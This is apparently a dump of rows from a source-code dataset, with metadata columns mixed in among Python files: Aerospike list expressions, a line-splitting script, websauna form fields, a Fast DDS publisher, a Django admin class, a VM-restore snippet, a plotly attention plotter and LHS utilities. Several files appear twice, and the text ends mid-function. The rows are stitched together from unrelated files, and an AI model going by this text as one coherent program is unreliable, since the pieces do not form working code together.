    _op = aerospike.OP_LIST_GET_BY_RANK

    def __init__(self, ctx: TypeCTX, return_type: int, value_type: int, rank: TypeRank, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value_type (int): The value type that will be returned by this expression (ResultType).
            rank (TypeRank): Rank integer or integer expression of element to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the smallest element in list bin "a".
            expr = exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, aerospike.ResultType.INTEGER, 0, exp.ListBin("a")).compile()
        """
        # Accept either a prebuilt expression node or a raw bin name.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, bin_expr)
        fixed = {_Keys.VALUE_TYPE_KEY: value_type, _Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByRankRangeToEnd(_BaseExpr):
    """ Create an expression that selects list items starting at specified rank to the last ranked item
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_RANK_RANGE_TO_END

    def __init__(self, ctx: TypeCTX, return_type: int, rank: TypeRank, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            rank (TypeRank): Rank integer or integer expression of first element to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the three largest elements in list bin "a".
            expr = exp.ListGetByRankRangeToEnd(None, aerospike.LIST_RETURN_VALUE, -3, exp.ListBin("a")).compile()
        """
        # Accept either a prebuilt expression node or a raw bin name.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, bin_expr)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByRankRange(_BaseExpr):
    """ Create an expression that selects "count" list items starting at specified rank
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_RANK_RANGE

    def __init__(self, ctx: TypeCTX, return_type: int, rank: TypeRank, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            rank (TypeRank): Rank integer or integer expression of first element to get.
            count (TypeCount): Count integer or integer expression for how many elements to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the 3 smallest elements in list bin "a".
            expr = exp.ListGetByRankRange(None, aerospike.LIST_RETURN_VALUE, 0, 3, exp.ListBin("a")).compile()
        """
        # Accept either a prebuilt expression node or a raw bin name.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, count, bin_expr)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
| 0 | 0 | 0 |
f63c55bac69dfb491106ccd06c919a0136dd5de3 | 885 | py | Python | files/split.py | acepj60/MkCheck | 7765cfad3e7ef198945fa2fe70c1b3cb8f9e5290 | [
"Unlicense"
] | 1 | 2021-11-06T23:02:22.000Z | 2021-11-06T23:02:22.000Z | files/split.py | whiterabb17/MkCheck | 567ab17743209e08e5d8d391a8eaf217cb0dd3c5 | [
"Unlicense"
] | null | null | null | files/split.py | whiterabb17/MkCheck | 567ab17743209e08e5d8d391a8eaf217cb0dd3c5 | [
"Unlicense"
#!/usr/bin/env python3
"""Split a line-oriented file into sequential chunk files.

Fixes over the original script: valid shebang (``#!``), a ``__main__``
guard so importing the module has no side effects, the duplicated
"full chunk"/"last chunk" loops merged, and the chunk size / paths
made parameters instead of being hard-coded.
"""


def split_file(input_path, output_template, chunk_size=51):
    """Split *input_path* into consecutive files of ``chunk_size`` lines.

    The n-th chunk (1-based) is written to
    ``output_template.format(n * chunk_size)``, e.g. ``small_file_51.txt``,
    ``small_file_102.txt`` ... The final file holds the remainder; as in the
    original script, an input whose length is a multiple of ``chunk_size``
    (including an empty input) still produces a trailing empty file.

    :param input_path: path of the file to split.
    :param output_template: format string with one ``{}`` placeholder for
        the cumulative line count.
    :param chunk_size: number of lines per output file.
    """
    with open(input_path, 'r') as text_file:
        hold_lines = text_file.readlines()
    chunk_index = 0
    while True:
        chunk = hold_lines[chunk_index * chunk_size:(chunk_index + 1) * chunk_size]
        chunk_index += 1
        file_name = output_template.format(chunk_index * chunk_size)
        with open(file_name, 'w') as next_file:
            next_file.writelines(chunk)
        # A short (or empty) chunk means the input is exhausted.
        if len(chunk) < chunk_size:
            break


if __name__ == '__main__':
    split_file('/opt/MkCheck/files/tiks.txt',
               '/opt/MkCheck/files/small_file_{}.txt')
| 28.548387 | 81 | 0.6 | #/usr/bin/env python3
# Split /opt/MkCheck/files/tiks.txt into sequential chunk files of 51 lines
# each, named small_file_51.txt, small_file_102.txt, ... (cumulative count).
# NOTE: this runs at import time (no __main__ guard).
my_file = '/opt/MkCheck/files/tiks.txt'
sorting = True  # loop flag; cleared once the final (short) chunk is written
hold_lines = []
# Read the whole source file into memory.
with open(my_file,'r') as text_file:
    for row in text_file:
        hold_lines.append(row)
outer_count = 1  # 1-based chunk counter, used for the output file names
line_count = 0   # index of the next unwritten line in hold_lines
while sorting:
    count = 0
    increment = (outer_count-1) * 51          # lines already written out
    left = len(hold_lines) - increment        # lines still to write
    # Output name encodes the cumulative line count (e.g. small_file_51.txt).
    file_name = "/opt/MkCheck/files/small_file_" + str(outer_count * 51) + ".txt"
    hold_new_lines = []
    if left < 51:
        # Final chunk: fewer than 51 lines remain.
        while count < left:
            hold_new_lines.append(hold_lines[line_count])
            count += 1
            line_count += 1
        sorting = False
    else:
        # Full chunk of exactly 51 lines.
        while count < 51:
            hold_new_lines.append(hold_lines[line_count])
            count += 1
            line_count += 1
        outer_count += 1
    with open(file_name,'w') as next_file:
        for row in hold_new_lines:
            next_file.write(row)
468df631c0ced920bcc593cd678b29e0a5f82a05 | 3,710 | py | Python | websauna/system/form/fields.py | maikroeder/websauna | fd266cf5e4761cd4c1f3e33be47ad8358b4c6afa | [
"CNRI-Python"
] | null | null | null | websauna/system/form/fields.py | maikroeder/websauna | fd266cf5e4761cd4c1f3e33be47ad8358b4c6afa | [
"CNRI-Python"
] | null | null | null | websauna/system/form/fields.py | maikroeder/websauna | fd266cf5e4761cd4c1f3e33be47ad8358b4c6afa | [
"CNRI-Python"
] | 1 | 2021-04-15T17:35:57.000Z | 2021-04-15T17:35:57.000Z | import enum
import json
import colander
import deform
from websauna.compat.typing import Union
from websauna.compat.typing import Callable
from websauna.system.model.json import NestedMutationDict, NestedMutationList, json_serializer
def defer_widget_values(widget: type, values_callback: Callable, **kwargs) -> deform.widget.Widget:
    """Allow select or checkbox widget values construction deferred during the execution time.

    :param widget: Any Deform widget class, see :py:class:`deform.widget.Widget`
    :param values_callback: This callable(node, kw) is called deferredly by Colander
    :param kwargs: Passed to the widget constructed
    """
    _widget = widget

    @colander.deferred
    def _inner(node, kw):
        # Construct the widget lazily, when Colander binds the schema.
        # The inner function had been lost here, leaving ``return _inner``
        # dangling; kwargs are now forwarded as the docstring promises.
        return _widget(values=values_callback(node, kw), **kwargs)

    return _inner
class UUID(colander.String):
    """UUID field for Colander.

    See also :py:class`websauna.system.form.widgets.FriendlyUUIDWidget`.
    """

    def serialize(self, node, appstruct):
        """Pass the appstruct through unchanged.

        Without this override, colander.String would stringify the value;
        the paired widget expects the raw :class:`uuid.UUID` object.
        """
        # Assume widgets can handle raw UUID object
        return appstruct
class EnumValue(colander.String):
    """Allow choice of python enum.Enum in colander schemas.

    Example:

    .. code-block:: python

        class AssetClass(enum.Enum):
            '''What's preferred display format for this asset.'''
            fiat = "fiat"
            cryptocurrency = "cryptocurrency"
            token = "token"
            tokenized_shares = "tokenized_shares"
            ether = "ether"

        class Schema(CSRFSchema):
            asset_class = colander.SchemaNode(
                EnumValue(AssetClass),
                widget=deform.widget.SelectWidget(values=enum_values(AssetClass)))
    """

    def __init__(self, enum_class: type):
        """Remember the concrete Enum subclass used for conversions.

        This constructor had been lost; without it ``self.enum_class``
        (used by both conversions below) was never set.
        """
        super().__init__()
        assert issubclass(enum_class, enum.Enum), "Expected Enum, got {}".format(enum_class)
        self.enum_class = enum_class

    def deserialize(self, node: colander.SchemaNode, cstruct: str):
        """Parse incoming form values to Python objects if needed.
        """
        if cstruct:
            return self.enum_class(cstruct)
        else:
            return None

    def serialize(self, node: colander.SchemaNode, _enum: enum.Enum) -> str:
        """Convert Enum object to str for widget processing."""
        if _enum:
            assert isinstance(_enum, self.enum_class), "Expected {}, got {}".format(self.enum_class, _enum)
            return _enum.value
        else:
            return _enum
class JSONValue(colander.String):
    """Serialize / deserialize JSON fields.

    Example:

    .. code-block:: python

        class AssetSchema(CSRFSchema):
            name = colander.SchemaNode(colander.String())
            other_data = colander.SchemaNode(
                JSONValue(),
                widget=JSONWidget(),
                description="JSON bag of attributes of the object")
    """

    def deserialize(self, node: colander.SchemaNode, cstruct: str):
        """Parse incoming form values to Python objects if needed.
        """
        if not cstruct:
            # Empty / missing form value.
            return None
        try:
            return json.loads(cstruct)
        except json.JSONDecodeError as e:
            raise colander.Invalid(node, "Not valid JSON") from e

    def serialize(self, node: colander.SchemaNode, data: Union[list, dict]) -> str:
        """Convert Python objects to JSON string."""
        if not data:
            # Noneish
            return data
        assert isinstance(data, (list, dict, NestedMutationDict, NestedMutationList)), "Expected list or dict, got {}".format(data.__class__)
        return json_serializer(data)
import json
import colander
import deform
from websauna.compat.typing import Union
from websauna.compat.typing import Callable
from websauna.system.model.json import NestedMutationDict, NestedMutationList, json_serializer
def defer_widget_values(widget: type, values_callback: Callable, **kwargs) -> deform.widget.Widget:
    """Allow select or checkbox widget values construction deferred during the execution time.

    :param widget: Any Deform widget class, see :py:class:`deform.widget.Widget`
    :param values_callback: This callable(node, kw) is called deferredly by Colander
    :param kwargs: Passed to the widget constructed
    """
    _widget = widget

    @colander.deferred
    def _inner(node, kw):
        # Construct the widget lazily, when Colander binds the schema.
        # kwargs were documented as forwarded but previously dropped;
        # pass them on to the widget constructor.
        return _widget(values=values_callback(node, kw), **kwargs)

    return _inner
class UUID(colander.String):
    """UUID field for Colander.

    See also :py:class`websauna.system.form.widgets.FriendlyUUIDWidget`.
    """

    def serialize(self, node, appstruct):
        # Pass the value through untouched: the paired widget accepts the
        # raw uuid.UUID (or colander.null) rather than a pre-rendered string.
        # Assume widgets can handle raw UUID object
        return appstruct
class EnumValue(colander.String):
    """Allow choice of python enum.Enum in colander schemas.

    Example:

    .. code-block:: python

        class AssetClass(enum.Enum):
            '''What's preferred display format for this asset.'''
            fiat = "fiat"
            cryptocurrency = "cryptocurrency"
            token = "token"
            tokenized_shares = "tokenized_shares"
            ether = "ether"

        class Schema(CSRFSchema):
            asset_class = colander.SchemaNode(
                EnumValue(AssetClass),
                widget=deform.widget.SelectWidget(values=enum_values(AssetClass)))
    """

    def __init__(self, enum_class: type):
        """Remember which Enum subclass this schema type converts to and from."""
        super().__init__()
        assert issubclass(enum_class, enum.Enum), "Expected Enum, got {}".format(enum_class)
        self.enum_class = enum_class

    def deserialize(self, node: colander.SchemaNode, cstruct: str):
        """Parse incoming form values to Python objects if needed.
        """
        if not cstruct:
            # Empty / missing form value.
            return None
        return self.enum_class(cstruct)

    def serialize(self, node: colander.SchemaNode, _enum: enum.Enum) -> str:
        """Convert Enum object to str for widget processing."""
        if not _enum:
            # Falsy values (None and friends) pass through unchanged.
            return _enum
        assert isinstance(_enum, self.enum_class), "Expected {}, got {}".format(self.enum_class, _enum)
        return _enum.value
class JSONValue(colander.String):
    """Serialize / deserialize JSON fields.

    Example:

    .. code-block:: python

        class AssetSchema(CSRFSchema):
            name = colander.SchemaNode(colander.String())
            other_data = colander.SchemaNode(
                JSONValue(),
                widget=JSONWidget(),
                description="JSON bag of attributes of the object")
    """

    def deserialize(self, node: colander.SchemaNode, cstruct: str):
        """Parse incoming form values to Python objects if needed.
        """
        if not cstruct:
            # Empty / missing form value.
            return None
        try:
            return json.loads(cstruct)
        except json.JSONDecodeError as e:
            raise colander.Invalid(node, "Not valid JSON") from e

    def serialize(self, node: colander.SchemaNode, data: Union[list, dict]) -> str:
        """Convert Python objects to JSON string."""
        if not data:
            # Noneish
            return data
        assert isinstance(data, (list, dict, NestedMutationDict, NestedMutationList)), "Expected list or dict, got {}".format(data.__class__)
        return json_serializer(data)
c5d192f0d3e6f2a85910c1d1c34a01b007447f70 | 4,044 | py | Python | code/Examples/Python/HelloWorld/HelloWorldPublisher.py | xander-m2k/Fast-DDS-docs | 13e20cd24e159cdb5f2e7ab1fdb87880c2370aa0 | [
"Apache-2.0"
] | null | null | null | code/Examples/Python/HelloWorld/HelloWorldPublisher.py | xander-m2k/Fast-DDS-docs | 13e20cd24e159cdb5f2e7ab1fdb87880c2370aa0 | [
"Apache-2.0"
] | null | null | null | code/Examples/Python/HelloWorld/HelloWorldPublisher.py | xander-m2k/Fast-DDS-docs | 13e20cd24e159cdb5f2e7ab1fdb87880c2370aa0 | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 Proyectos y Sistemas de Mantenimiento SL (eProsima).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
HelloWorld Publisher
"""
from threading import Condition
import time
import fastdds
import HelloWorld
DESCRIPTION = """HelloWorld Publisher example for Fast DDS python bindings"""
USAGE = ('python3 HelloWorldPublisher.py')
if __name__ == '__main__':
print('Starting publisher.')
writer = Writer()
writer.run()
exit()
| 35.165217 | 117 | 0.691642 | # Copyright 2022 Proyectos y Sistemas de Mantenimiento SL (eProsima).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
HelloWorld Publisher
"""
from threading import Condition
import time
import fastdds
import HelloWorld
DESCRIPTION = """HelloWorld Publisher example for Fast DDS python bindings"""
USAGE = ('python3 HelloWorldPublisher.py')
class WriterListener (fastdds.DataWriterListener) :
def __init__(self, writer) :
self._writer = writer
super().__init__()
def on_publication_matched(self, datawriter, info) :
if (0 < info.current_count_change) :
print ("Publisher matched subscriber {}".format(info.last_subscription_handle))
self._writer._cvDiscovery.acquire()
self._writer._matched_reader += 1
self._writer._cvDiscovery.notify()
self._writer._cvDiscovery.release()
else :
print ("Publisher unmatched subscriber {}".format(info.last_subscription_handle))
self._writer._cvDiscovery.acquire()
self._writer._matched_reader -= 1
self._writer._cvDiscovery.notify()
self._writer._cvDiscovery.release()
class Writer:
def __init__(self):
self._matched_reader = 0
self._cvDiscovery = Condition()
self.index = 0
factory = fastdds.DomainParticipantFactory.get_instance()
self.participant_qos = fastdds.DomainParticipantQos()
factory.get_default_participant_qos(self.participant_qos)
self.participant = factory.create_participant(0, self.participant_qos)
self.topic_data_type = HelloWorld.HelloWorldPubSubType()
self.topic_data_type.setName("HelloWorld")
self.type_support = fastdds.TypeSupport(self.topic_data_type)
self.participant.register_type(self.type_support)
self.topic_qos = fastdds.TopicQos()
self.participant.get_default_topic_qos(self.topic_qos)
self.topic = self.participant.create_topic("HelloWorldTopic", self.topic_data_type.getName(), self.topic_qos)
self.publisher_qos = fastdds.PublisherQos()
self.participant.get_default_publisher_qos(self.publisher_qos)
self.publisher = self.participant.create_publisher(self.publisher_qos)
self.listener = WriterListener(self)
self.writer_qos = fastdds.DataWriterQos()
self.publisher.get_default_datawriter_qos(self.writer_qos)
self.writer = self.publisher.create_datawriter(self.topic, self.writer_qos, self.listener)
def write(self):
data = HelloWorld.HelloWorld()
data.message("Hello World")
data.index(self.index)
self.writer.write(data)
print("Sending {message} : {index}".format(message=data.message(), index=data.index()))
self.index = self.index + 1
def wait_discovery(self) :
self._cvDiscovery.acquire()
print ("Writer is waiting discovery...")
self._cvDiscovery.wait_for(lambda : self._matched_reader != 0)
self._cvDiscovery.release()
print("Writer discovery finished...")
def run(self):
self.wait_discovery()
for x in range(10) :
time.sleep(1)
self.write()
self.delete()
def delete(self):
factory = fastdds.DomainParticipantFactory.get_instance()
self.participant.delete_contained_entities()
factory.delete_participant(self.participant)
if __name__ == '__main__':
print('Starting publisher.')
writer = Writer()
writer.run()
exit()
| 2,824 | 22 | 234 |
86f75c2522b6bfb188910c0c2dfff8de507bbbd7 | 772 | py | Python | mainapp/accounts/admin.py | mfjimenezco/django-adminlte-base | 00384e62e408e43b5a178bd180d7fb4aff134b2b | [
"MIT"
] | null | null | null | mainapp/accounts/admin.py | mfjimenezco/django-adminlte-base | 00384e62e408e43b5a178bd180d7fb4aff134b2b | [
"MIT"
] | null | null | null | mainapp/accounts/admin.py | mfjimenezco/django-adminlte-base | 00384e62e408e43b5a178bd180d7fb4aff134b2b | [
"MIT"
] | null | null | null | """
Account admin register.
"""
# Django
from django.contrib import admin
from django.contrib import messages
# Models
from accounts.models import UserRequest
@admin.register(UserRequest)
class UserRequestAdmin(admin.ModelAdmin):
    """User Request Admin"""

    # Columns shown on the changelist page.
    list_display = (
        'username',
        'email',
        'is_accepted',
    )
    # Fields covered by the admin search box.
    search_fields = (
        'username',
        'email',
    )
    # Sidebar filter.
    list_filter = (
        'is_accepted',
    )
    # Editable directly from the changelist (must also appear in list_display).
    list_editable = ('is_accepted',)

    def save_model(self, request, obj, form, change):
        """Persist *obj*, surfacing any save failure as an admin error message.

        Restores the override so save errors reach the admin UI instead of a
        500 page (and so the module-level ``messages`` import is used).
        """
        try:
            super(UserRequestAdmin, self).save_model(request, obj, form, change)
        except Exception as e:
            # Add error message
            messages.add_message(request, messages.ERROR, e)
Account admin register.
"""
# Django
from django.contrib import admin
from django.contrib import messages
# Models
from accounts.models import UserRequest
@admin.register(UserRequest)
class UserRequestAdmin(admin.ModelAdmin):
    """User Request Admin"""

    # Columns shown on the changelist page.
    list_display = (
        'username',
        'email',
        'is_accepted',
    )
    # Fields covered by the admin search box.
    search_fields = (
        'username',
        'email',
    )
    # Sidebar filter.
    list_filter = (
        'is_accepted',
    )
    # Editable directly from the changelist (must also appear in list_display).
    list_editable = ('is_accepted',)

    def save_model(self, request, obj, form, change):
        # Persist the object; on failure show the error in the admin UI
        # instead of raising (deliberate best-effort broad catch).
        try:
            super(UserRequestAdmin, self).save_model(request, obj, form, change)
        except Exception as e:
            # Add error message
            messages.add_message(request, messages.ERROR, e)
b8169855ec0aaf15dc5d25cc4a2e7fb043cb45d6 | 33 | py | Python | tests/__init__.py | fundamentals-of-data-science/ct1 | 26a0abf06fd4324636d7944369d6a8be2d66ec71 | [
"MIT"
] | null | null | null | tests/__init__.py | fundamentals-of-data-science/ct1 | 26a0abf06fd4324636d7944369d6a8be2d66ec71 | [
"MIT"
] | 134 | 2020-12-14T08:21:54.000Z | 2022-03-31T21:06:13.000Z | tests/__init__.py | fundamentals-of-data-science/ct1 | 26a0abf06fd4324636d7944369d6a8be2d66ec71 | [
"MIT"
] | null | null | null | """Unit test package for ct1."""
| 16.5 | 32 | 0.636364 | """Unit test package for ct1."""
| 0 | 0 | 0 |
a9fc4344ed64e93da9a289bce09caae40d52fb57 | 141 | py | Python | src/compath_resources/exporters/__init__.py | ComPath/resources | e8da7b511c2b558b8fd0bf38888b512008ac1ba3 | [
"MIT"
] | 3 | 2018-05-14T14:46:39.000Z | 2019-06-20T10:28:26.000Z | src/compath_resources/exporters/__init__.py | ComPath/compath-resources | e8da7b511c2b558b8fd0bf38888b512008ac1ba3 | [
"MIT"
] | 13 | 2020-03-28T13:36:32.000Z | 2021-01-19T15:00:07.000Z | src/compath_resources/exporters/__init__.py | ComPath/resources | e8da7b511c2b558b8fd0bf38888b512008ac1ba3 | [
"MIT"
] | 1 | 2021-12-01T09:49:59.000Z | 2021-12-01T09:49:59.000Z | # -*- coding: utf-8 -*-
"""Exporters for ComPath resources."""
from .bel import get_bel # noqa:F401
from .rdf import get_rdf # noqa:F401
| 20.142857 | 38 | 0.666667 | # -*- coding: utf-8 -*-
"""Exporters for ComPath resources."""
from .bel import get_bel # noqa:F401
from .rdf import get_rdf # noqa:F401
| 0 | 0 | 0 |
a1bafe40f9d60a18d8fce01e601bfa263bc96c72 | 183 | py | Python | bindings/python/examples/Restore.py | Fimbure/icebox-1 | 0b81992a53e1b410955ca89bdb6f8169d6f2da86 | [
"MIT"
] | 521 | 2019-03-29T15:44:08.000Z | 2022-03-22T09:46:19.000Z | bindings/python/examples/Restore.py | Fimbure/icebox-1 | 0b81992a53e1b410955ca89bdb6f8169d6f2da86 | [
"MIT"
] | 30 | 2019-06-04T17:00:49.000Z | 2021-09-08T20:44:19.000Z | bindings/python/examples/Restore.py | Fimbure/icebox-1 | 0b81992a53e1b410955ca89bdb6f8169d6f2da86 | [
"MIT"
] | 99 | 2019-03-29T16:04:13.000Z | 2022-03-28T16:59:34.000Z | import struct
from PyFDP.FDP import FDP
if __name__ == '__main__':
    # Attach to the VM snapshot matching the analyzed guest OS;
    # the commented alternatives are other guest images.
    #fdp = FDP("7_SP1_x64")
    fdp = FDP("8_1_x64")
    #fdp = FDP("10_x64")
    # Roll the VM back to the previously saved FDP state.
    fdp.Restore()
| 15.25 | 27 | 0.551913 | import struct
from PyFDP.FDP import FDP
if __name__ == '__main__':
    # Attach to the VM snapshot matching the analyzed guest OS;
    # the commented alternatives are other guest images.
    #fdp = FDP("7_SP1_x64")
    fdp = FDP("8_1_x64")
    #fdp = FDP("10_x64")
    # Roll the VM back to the previously saved FDP state.
    fdp.Restore()
| 0 | 0 | 0 |
1c400f0eed5bedcf15ac83b8b0358c7c54ae6b43 | 21 | py | Python | salad/__init__.py | Work4Labs/salad | 176869a4437103d501feb3035beaf162c2507435 | [
"BSD-3-Clause"
] | null | null | null | salad/__init__.py | Work4Labs/salad | 176869a4437103d501feb3035beaf162c2507435 | [
"BSD-3-Clause"
] | null | null | null | salad/__init__.py | Work4Labs/salad | 176869a4437103d501feb3035beaf162c2507435 | [
"BSD-3-Clause"
] | null | null | null | VERSION = "0.4.14.2"
| 10.5 | 20 | 0.571429 | VERSION = "0.4.14.2"
| 0 | 0 | 0 |
0664b5cd87247d123675d6ed514eb83e81d53698 | 3,755 | py | Python | utils/attention_plotter_utils.py | inboxedshoe/attention-learn-to-route | d9ebb13ec7e06fc5d2373c851a13913dab1594fc | [
"MIT"
] | null | null | null | utils/attention_plotter_utils.py | inboxedshoe/attention-learn-to-route | d9ebb13ec7e06fc5d2373c851a13913dab1594fc | [
"MIT"
] | null | null | null | utils/attention_plotter_utils.py | inboxedshoe/attention-learn-to-route | d9ebb13ec7e06fc5d2373c851a13913dab1594fc | [
"MIT"
] | null | null | null |
import numpy as np
import plotly.graph_objs as go
import networkx as nx
#creates the data graph instance
#this will create our initial plotly graph to display
| 29.108527 | 88 | 0.530226 |
import numpy as np
import plotly.graph_objs as go
import networkx as nx
#creates the data graph instance
def generate_graph(pts, instance=0, dictionary=True):
    """Build a complete networkx graph for one routing instance.

    Args:
        pts: Batch of instances. When ``dictionary`` is True, a mapping with
            "depot", "loc" and "demand" entries (tensors: they are moved to
            CPU and converted with .tolist() -- assumed torch tensors, TODO
            confirm shapes). Otherwise a sequence where ``pts[instance]`` is
            ``(depot_pos, node_positions, demands)``.
        instance: Index of the instance to use within the batch.
        dictionary: Selects between the two input layouts above.

    Returns:
        A fully connected networkx graph whose node 0 is the depot
        (demand 0) and whose nodes carry "pos" and "demand" attributes.
    """
    if not dictionary:
        # Copy before inserting the depot entries: the original inserted into
        # pts' own lists in place, corrupting the instance data on reuse.
        temp_demand = list(pts[instance][2])
        temp_demand.insert(0, 0)
        temp_pos = list(pts[instance][1])
        temp_pos.insert(0, pts[instance][0])
    else:
        # .tolist() already yields fresh lists, so inserting here is safe.
        temp_demand = pts["demand"][instance].cpu().tolist()
        temp_demand.insert(0, 0)
        temp_pos = pts["loc"][instance].cpu().tolist()
        temp_pos.insert(0, pts["depot"][instance].cpu().tolist())
    # complete_graph already creates nodes 0..N-1; add_node just attaches
    # the position/demand attributes.
    graph = nx.complete_graph(len(temp_pos))
    for i in range(0, len(temp_pos)):
        graph.add_node(i, pos=temp_pos[i], demand=temp_demand[i])
    return graph
#this will create our initial plotly graph to display
def create_plotly(G, logs):
    """Render graph *G* as a plotly figure, coloring nodes by attention.

    Args:
        G: networkx graph whose nodes carry a 'pos' (x, y) attribute.
        logs: log-probabilities; only logs[0] is used, exponentiated into
            probabilities for the node colors and hover text.
            NOTE(review): len(logs[0]) must equal the node count -- confirm
            against the caller.

    Returns:
        A square (800x800, equal-aspect) plotly ``go.Figure`` with one edge
        trace and one node trace.
    """
    #get the nodes and edges
    edge_x = []
    edge_y = []
    # Each edge contributes its two endpoints plus None, which breaks the
    # line so plotly draws separate segments within a single trace.
    for edge in G.edges():
        x0, y0 = G.nodes[edge[0]]['pos']
        x1, y1 = G.nodes[edge[1]]['pos']
        edge_x.append(x0)
        edge_x.append(x1)
        edge_x.append(None)
        edge_y.append(y0)
        edge_y.append(y1)
        edge_y.append(None)
    #create a scatter plot
    edge_trace = go.Scatter(
        x=edge_x, y=edge_y,
        line=dict(width=0.5, color='#888'),
        hoverinfo='none',
        mode='lines')
    #place the nodes in the respective position in the plot
    node_x = []
    node_y = []
    for node in G.nodes():
        x, y = G.nodes[node]['pos']
        node_x.append(x)
        node_y.append(y)
    #customize the nodes (change color, shape....)
    node_trace = go.Scatter(
        x=node_x, y=node_y,
        mode='markers',
        hoverinfo='text',
        marker=dict(
            showscale=True,
            # colorscale options
            # 'Greys' | 'YlGnBu' | 'Greens' | 'YlOrRd' | 'Bluered' | 'RdBu' |
            # 'Reds' | 'Blues' | 'Picnic' | 'Rainbow' | 'Portland' | 'Jet' |
            # 'Hot' | 'Blackbody' | 'Earth' | 'Electric' | 'Viridis' |
            colorscale='YlOrRd',
            reversescale=False,
            color=[],
            size=15,
            colorbar=dict(
                thickness=15,
                title='attention_prob',
                xanchor='left',
                titleside='right'
            ),
            line_width=2))
    # exp() turns log-probabilities into probabilities for color/hover text.
    node_trace.marker.color = np.exp(logs[0])
    node_trace.text = np.exp(logs[0])
    node_trace.marker.line.color = "black"
    # NOTE(review): a single-element symbol list appears intended to draw
    # node 0 (the depot) as a square, leaving the rest at the default
    # circle -- confirm plotly's fill behavior.
    node_trace.marker.symbol = ["square"]
    # draw
    fig = go.Figure(data=[edge_trace, node_trace],
                    layout=go.Layout(
                        title='',
                        titlefont_size=16,
                        showlegend=False,
                        hovermode='closest',
                        margin=dict(b=20, l=5, r=5, t=40),
                        annotations=[dict(
                            text="",
                            showarrow=False,
                            xref="paper", yref="paper",
                            x=0.005, y=-0.002)],
                        xaxis=dict(showgrid=False, zeroline=False, showticklabels=True),
                        yaxis=dict(showgrid=False, zeroline=False, showticklabels=True))
                    )
    fig.update_layout(
        width=800,
        height=800
    )
    # Lock the aspect ratio so coordinates are not distorted.
    fig.update_yaxes(
        scaleanchor="x",
        scaleratio=1,
    )
    return fig
| 3,547 | 0 | 44 |
743b485b8add2d51b33af6b72fb698306723a312 | 2,848 | py | Python | GAparsimony/lhs/util/utilityLHS.py | misantam/GAparsimony | 0241092dc5d7741b5546151ff829167588e4f703 | [
"MIT"
] | null | null | null | GAparsimony/lhs/util/utilityLHS.py | misantam/GAparsimony | 0241092dc5d7741b5546151ff829167588e4f703 | [
"MIT"
] | 1 | 2021-12-05T10:24:55.000Z | 2021-12-05T11:01:25.000Z | GAparsimony/lhs/util/utilityLHS.py | misantam/GAparsimony | 0241092dc5d7741b5546151ff829167588e4f703 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import numpy as np
from .bclib import inner_product
| 28.19802 | 104 | 0.572331 | # -*- coding: utf-8 -*-
import numpy as np
from .bclib import inner_product
def isValidLHS_int(matrix):
for jcol in range(matrix.shape[1]):
total = 0
for irow in range(matrix.shape[0]):
total = total + matrix[irow, jcol]
if not total == int(matrix.shape[0] * (matrix.shape[0] + 1) / 2):
return False
return True
def isValidLHS(matrix):
    """Check a matrix of [0, 1) samples for Latin-hypercube validity.

    Each sample is mapped to an integer level 1..n (n = number of rows),
    and each column's level sum is compared with n*(n+1)/2, exactly as the
    original row-by-row + column-by-column loops did, but vectorized.
    """
    n = matrix.shape[0]
    # Map each uniform sample in [0, 1) to its stratum index 1..n.
    levels = 1 + np.floor(np.double(n) * matrix).astype(np.int32)
    expected = int(n * (n + 1) / 2)
    return bool(np.all(levels.sum(axis=0) == expected))
def initializeAvailableMatrix(i, j):
